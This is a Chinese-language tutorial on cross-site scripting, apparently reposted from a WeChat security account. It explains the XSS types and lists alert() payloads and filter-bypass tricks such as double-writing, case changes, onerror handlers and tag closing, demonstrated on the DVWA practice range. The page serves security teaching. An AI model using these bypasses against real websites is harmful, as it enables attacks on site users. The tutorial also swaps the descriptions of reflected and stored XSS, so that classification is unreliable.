XSS跨站脚本攻击漏洞

admin
admin
admin
138635
文章
114
评论
2024年5月11日10:40:14评论12 views字数 2250阅读7分30秒阅读模式

一、简介

1.概念

XSS又叫CSS(Cross Site Script)跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS漏洞通常是通过PHP的输出函数将Javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。

常见的输出函数有:

echo printf printprint_r sprintf dievar-dump var_export.

2.分类

(1)反射型XSS

一般在留言板,用户发帖,用户回帖,经过后端但不过数据库

(2)存储型XSS

一般在URL,搜索框,也有在GET和POST参数中,经过后端同时经过数据库

(3)DOM型XSS

基于DOM文档对象模型的一种XSS,不与后台服务器产生数据交互,通过前端的dom节点形成的xss漏洞

二、常见XSS的Payload构造及绕过

1.反射型XSS

(1)常规

<script>alert(1)</script>

(2)双写绕过

<sc<script>alert(1)</script>

(3)大小写绕过(随机选择改写)

<Script>alert(1)</script>

(4)<img>绕过(过滤掉了<>,script)

<img src=1οnerrοr=alert(1)

XSS跨站脚本攻击漏洞

2.存储型XSS

以DVWA为例,可以看到,当我们再name框中输入语句时长度被限制了。

XSS跨站脚本攻击漏洞

打开F12,定位到name框,使用“查看器”旁边的定位功能

XSS跨站脚本攻击漏洞

将长度改长一些

XSS跨站脚本攻击漏洞

这个时候再去输入语句,执行

XSS跨站脚本攻击漏洞

3.DOM型XSS

以DVWA靶场的Medium级别DOM型XSS为例

XSS跨站脚本攻击漏洞

点击select,发现URL上出现了一个default=English,我们可以尝试将English替换成JS语句去执行,但是输入JS语句之后发现无法执行,那么可能是对<script>等语句进行了过滤。

XSS跨站脚本攻击漏洞

查看源代码,可以看到源代码对<script进行了过滤,所以我们不能再使用<script>

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

打开F12并定位,可以看到语句已经存入了value值,但是没有执行成功是因为没有闭合<option>标签,再加上本身过滤了<script>函数,那么我们可以将语句构造如下

></option></select><img src=1 onerror=alert('xss');>

XSS跨站脚本攻击漏洞

执行成功

XSS跨站脚本攻击漏洞

4.针对各种过滤的绕过方法总结

(1)未对参数进行任何过滤的

<script>alert()</script>

<img src=1 onerror=alert()>

(2)payload被引号包裹的

例如:<input name=keyword value="<script>alert()</script>">

#闭合标签和字符串

先闭合引号,对于标签中不能包含script标签的,

在闭合此标签 "><script>alert()</script>"

(在最后加引号是因为引号总是成对出现的,这个引号是为了闭合原input标签中value属性值的最后一个引号)

#向标签中添加属性和方法

先闭合引号,在向input标签中添加onclick方法和type属性,

这样点击文本框时就可以执行代码。

payload:" onclick=alert() type="text" "

(3)payload被更改的

如果网页对script和onclick对做了防范, 例如我们的payload为:"><script>alert()</script>" 注入到页面的效果为:<input name=keyword value="<scr_ipt>">,若选用向标签中添加onclick方法的方式。onclick会被更改为o_nclick 我们可以先屏蔽注入点初的标签

改用在页面中插入a标签 "><a href=javascript:alert()>

#这里是超链</a> href值为javascript:是目的是为了防止链接跳转,这里可以利用一下来执行js代码

(4)payload被更改但是不要求大小写的

和刚刚一样,若我们的onclick注入到页面中被更改为o_nclick,我们可以更改一下大小写

Onclick=alert() type="text"

(5)payload关键字被清除的

若我们的payload为 :"><script>alert()</script>" 注入到页面的效果为 "><>alert()</>" 可以看到我们的关键字script被清除,此时可以采用双写绕过,在script中在插入一个script

><scrscriptipt>alert()</sscriptcript>

浏览器将script中插入的script清除后,我们之前的script依然存在 输入到页面的效果为:><script>alert()</script>

来源:https://www.freebuf.com/

原文始发于微信公众号(船山信安):XSS跨站脚本攻击漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月11日10:40:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSS跨站脚本攻击漏洞https://cn-sec.com/archives/2729100.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息